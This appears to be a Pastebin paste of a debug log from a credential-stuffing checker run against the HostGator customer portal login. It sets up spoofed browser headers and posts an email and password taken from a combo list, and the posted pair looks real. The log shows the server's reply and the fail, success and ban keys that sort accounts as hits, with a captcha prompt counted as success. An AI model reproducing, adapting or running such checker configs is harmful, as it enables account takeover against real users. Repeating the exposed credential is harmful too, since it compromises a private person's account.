Guest User

sdsd

a guest
Sep 21st, 2018
148
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.43 KB | None | 0 0
  1.  
  2. ============
  3. Password: ur2smart
  4. Combo: [email protected]:ur2smart
  5. Proxy: None
  6. Proxy Type: Http
  7. ============
  8.  
  9. --------------
  10.  
  11. Declaring 'Link2' variable with 'https://portal.hostgator.com/login' value
  12.  
  13. --------------
  14.  
  15. Declaring 'Heads2' variable with 'Accept: application/json, text/javascript, */*; q=0.01
  16. Origin: https://portal.hostgator.com
  17. X-Requested-With: XMLHttpRequest
  18. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
  19. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  20. Referer: https://portal.hostgator.com/login?_ga=' value
  21.  
  22. --------------
  23.  
  24. Executing and Assigning 'CombineText("email=",urlencode($ComboUsername#),"&password=",urlencode($combopassword#),"&beta_optin=&beta_optin_checkbox=")' codes to 'Postd2' variable.
  25.  
  26. Execution result: email=9PdLe5j9%40hotmail.com&password=ur2smart&beta_optin=&beta_optin_checkbox=
  27.  
  28. --------------
  29.  
  30. --------------
  31.  
  32. Executing and Assigning 'combinetext($ComboUsername#, ":", $ComboPassword#)' codes to 'SaveFormat' variable.
  33.  
  34. Execution result: [email protected]:ur2smart
  35.  
  36. --------------
  37. ============ Stage 1 - Sent Data ============
  38. POST /login HTTP/1.1
  39. Accept: application/json, text/javascript, */*; q=0.01
  40. Origin: https://portal.hostgator.com
  41. X-Requested-With: XMLHttpRequest
  42. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
  43. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  44. Referer: https://portal.hostgator.com/login?_ga=
  45. Host: portal.hostgator.com
  46. Content-Length: 79
  47.  
  48. email=9PdLe5j9%40hotmail.com&password=ur2smart&beta_optin=&beta_optin_checkbox=
  49.  
  50. ============ Stage 1 - Received Data ============
  51. HTTP/1.1 401 Unauthorized
  52. Date: Fri, 21 Sep 2018 07:25:43 GMT
  53. Server: Apache
  54. Strict-Transport-Security: max-age=31536000; includeSubDomains
  55. X-Frame-Options: DENY
  56. Content-Length: 117
  57. Cache-Control: no-cache, no-store
  58. Pragma: no-cache
  59. Access-Control-Allow-Origin: https://portal.hostgator.com
  60. Vary: Origin
  61. Content-Type: application/json; charset=utf-8
  62. Set-Cookie: gbclient_session=545892270155450823645757722438955001; path=/; expires=Fri, 21-Sep-2018 09:25:43 GMT; Secure; HttpOnly
  63.  
  64.  
  65.  
  66. =====Start Received Source=====
  67. {"data":{"captcha":true},"flash":{"level":"notice","message":"Please complete the additional security requirements"}}
  68. =====End Received Source=====
  69.  
  70. --------------
  71.  
  72. Executing and Assigning 'indexof($Stage1ResponseSource# ,"Invalid email or password")' codes to 'FailKey2' variable.
  73.  
  74. Execution result: -1
  75.  
  76. --------------
  77.  
  78. --------------
  79.  
  80. Executing and Assigning 'indexof($Stage1ResponseSource# , "Please complete the additional security requirements")' codes to 'Suckey' variable.
  81.  
  82. Execution result: 62
  83.  
  84. --------------
  85.  
  86. --------------
  87.  
  88. Executing and Assigning 'indexof($Stage1ResponseSource#, ">An error has occurred while trying to access <a href=chr(double quotes)https://portal.hostgator.com/*chr(double quotes)>https://portal.hostgator.com/*<")' codes to 'BanKey' variable.
  89.  
  90. Execution result: -1
  91.  
  92. --------------
  93.  
  94. --------------
  95.  
  96. Executing '$BanKey# > 0' expression
  97.  
  98. Execution result: False
  99.  
  100. --------------
  101.  
  102. --------------
  103.  
  104. Executing '$Suckey# > 0' expression
  105.  
  106. Execution result: True
  107.  
  108. --------------
  109.  
  110. ============
  111. Check Result: Success
  112. Save Format: ================
  113.  
  114. ============
Advertisement
Add Comment
Please, Sign In to add comment